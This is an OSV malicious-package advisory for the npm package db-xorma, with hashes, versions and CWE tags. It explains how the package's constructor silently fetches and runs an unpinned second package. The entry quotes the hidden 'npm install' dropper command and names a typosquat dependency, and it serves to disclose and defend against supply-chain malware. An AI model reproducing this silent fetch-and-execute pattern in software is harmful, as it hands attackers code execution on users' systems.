MAL-2026-5464
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/db-xorma/MAL-2026-5464.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5464
- Published
- 2026-06-09T20:18:54Z
- Modified
- 2026-06-09T22:46:29.035862975Z
- Summary
- Malicious code in db-xorma (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (1428486c71a3cd7d89ea90a17631bb5dc0fee7e11a6cbb4d8029a8b25268c7d2)
db-xorma advertises itself as a reactive in-memory database library. When a consumer creates any Model instance (the documented entry point), the constructor calls Model.resetor(), which attempts to require('db-dx-connector') and, if missing, shells out via execSync to
npm install db-dx-connector --no-warnings --no-save --no-progress --loglevel silentwith stdio suppressed and windowsHide enabled. It then immediately requires the freshly-fetched package and invokesnew DxDatabaseConnector({}).queryDBConnect(). The fetched dependency is unpinned (whatever the attacker publishes at the moment of execution will run), --no-save evades the consumer's package.json/lockfile, and output is silenced. This is a runtime-dropper pattern that gives the publisher of db-dx-connector arbitrary code execution inside any process that imports db-xorma and constructs a Model. Additionally, package.json declares a dependency on 'child_process' ^1.0.2 — a known typosquat of the Node core module name, which adds an additional attacker-controlled code path via that package's own install lifecycle. A commented-out variant of the same dropper template targeting 'clsx-js' remains in dist/index.js, indicating the pattern is iterated across package names. - Database specific
{ "malicious-packages-origins": [ { "modified_time": "2026-06-09T20:18:54Z", "versions": [ "1.0.2" ], "sha256": "1428486c71a3cd7d89ea90a17631bb5dc0fee7e11a6cbb4d8029a8b25268c7d2", "id": "IN-MAL-2026-005191", "source": "amazon-inspector", "import_time": "2026-06-09T20:45:50.898140803Z" }, { "modified_time": "2026-06-09T21:39:41Z", "versions": [ "1.0.1" ], "sha256": "7a0a6d972b6cf17adb4b5bc9ed777b09afb307c801e56be6d81bf98216001c44", "id": "IN-MAL-2026-005248", "source": "amazon-inspector", "import_time": "2026-06-09T22:36:25.449546771Z" }, { "import_time": "2026-06-09T22:36:25.597822089Z", "versions": [ "1.0.0" ], "sha256": "b3ae2dc2f44f2924a368585ef601221e4a597fbd372c9eb24e13db5edb23834c", "id": "IN-MAL-2026-005251", "source": "amazon-inspector", "modified_time": "2026-06-09T21:43:32Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
Affected packages
npm / db-xorma
Package
- Name
- db-xorma
- View open source insights on deps.dev
- Purl
- pkg:npm/db-xorma
Database specific
indicators
{
"evidence_files": [
{
"sha256": "127dcd647b48bc15c326dc3f2d939e69d4b6bbb3b29ea99aa2bd8bb6026d8b6c",
"tlsh": "fc52138937fb2930456b30651e0f8107b63a944ba91dee4c7a9c42d4af4847e52f3bf9",
"path": "dist/index.js"
},
{
"sha256": "f9e7681bcf64652ef7f0b0b62b6a882a7d6e7873f57423da2be11b123cbc9141",
"tlsh": "46012630ca218ab356d825d05cbb15a36e62895b0446bc5833c7870c0a4e66b50fd6bd",
"path": "package.json"
}
],
"package_integrity": [
{
"hashes": {
"sha512_sri": "sha512-4UX2qrmBEnL/E7W+5tIqiLlKEXiqb+29+LIXSDEduDTA03/jHee0sEI3Buk6y7ql9AZGxNlfTIKQyqlpiWQKsw==",
"sha1": "21004e1bb8ffba2a67712600fd4308ed66e0ce61"
},
"filename": "db-xorma-1.0.2.tgz"
}
]
}
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/db-xorma/MAL-2026-5464.json"